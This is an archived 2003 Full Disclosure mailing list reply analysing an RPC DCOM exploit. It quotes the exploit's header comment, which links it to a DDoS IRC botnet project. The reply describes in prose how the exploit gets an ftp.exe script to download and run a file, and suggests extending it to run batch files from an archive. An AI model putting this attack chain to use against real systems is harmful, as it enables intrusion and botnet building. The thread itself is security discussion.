Full Disclosure mailing list archives
Re: DCOM Worm/scanner/autorooter !!!
From: Joey <joey2cool () yahoo com>
Date: Sun, 10 Aug 2003 03:49:42 -0700 (PDT)
i looked at the code and it is NOT a worm. It can be deployed on several computers very fast, but it doesn't have the ability self replicate itself from the target computer. basically this exploit sends a command to create a script for ftp.exe which it calls on by using "ftp -s scriptfile". The script contains the hostname, username, password, and file to download. then it runs the file after its done downloading. This can easily be modified to run multiple commands. You can set it to download a Self extracting rar/zip file and then run a batch file contained inside the SFX file after its done extracting. there is a very fine line between proof of concept code and worms. worms are highly illegal and if you publish the code you can be held responsible so make sure you are aware of this when posting here. this exploit is NOT a worm but the potential for it to be a worm is there... --- roman.kunz () juliusbaer com wrote:
hi folks, already saw a re-edited one whitch has only two targets (just as the last sploit by k-otik). <cut> /* RPC DCOM WORM v 2.3 - * originally by volkam, fixed and beefed by uv/graff * even more original concept by LSD-pl.net * original code by HDM * * -- * This code is in relation to a specific DDOS IRCD botnet project. * You may edit the code, and define which ftp to login * and which .exeutable file to recieve and run. * I use spybot, very convienent * - * So basicly script kids and brazilian children, this is useless to you * * - * shouts: darksyn - true homie , giver of 0d4yz, and testbeds * volkam - top sekret agent man * ntfx - master pupil * jpahk - true homie #2 * k3r0m - made that shit universal (2 targets WinXP - Win2k) * * Legion2000 Security Research (c) 2003 * - * enjoy!
__________________________________ Do you Yahoo!? Yahoo! SiteBuilder - Free, easy-to-use web site design software http://sitebuilder.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Red Bull Worm, (continued)
- RE: Red Bull Worm gml (Aug 07)
- Re: Red Bull Worm Brian Eckman (Aug 07)
- Re: Red Bull Worm Valdis . Kletnieks (Aug 07)
- Re: Red Bull Worm Joel R. Helgeson (Aug 07)
- Re: Red Bull Worm Brian Eckman (Aug 07)
- RE: Red Bull Worm Adam (Aug 07)
- Re: Red Bull Worm KF (Aug 07)
- Re: DCOM Worm/scanner/autorooter !!! Joey (Aug 07)
- RE: DCOM Worm/scanner/autorooter !!! Warren Rees (Aug 08)
- Re: DCOM Worm/scanner/autorooter !!! roman . kunz (Aug 08)
- Re: DCOM Worm/scanner/autorooter !!! Joey (Aug 10)
- Re: DCOM Worm/scanner/autorooter !!! Stephen (Aug 10)
- Re: DCOM Worm/scanner/autorooter !!! Joey (Aug 10)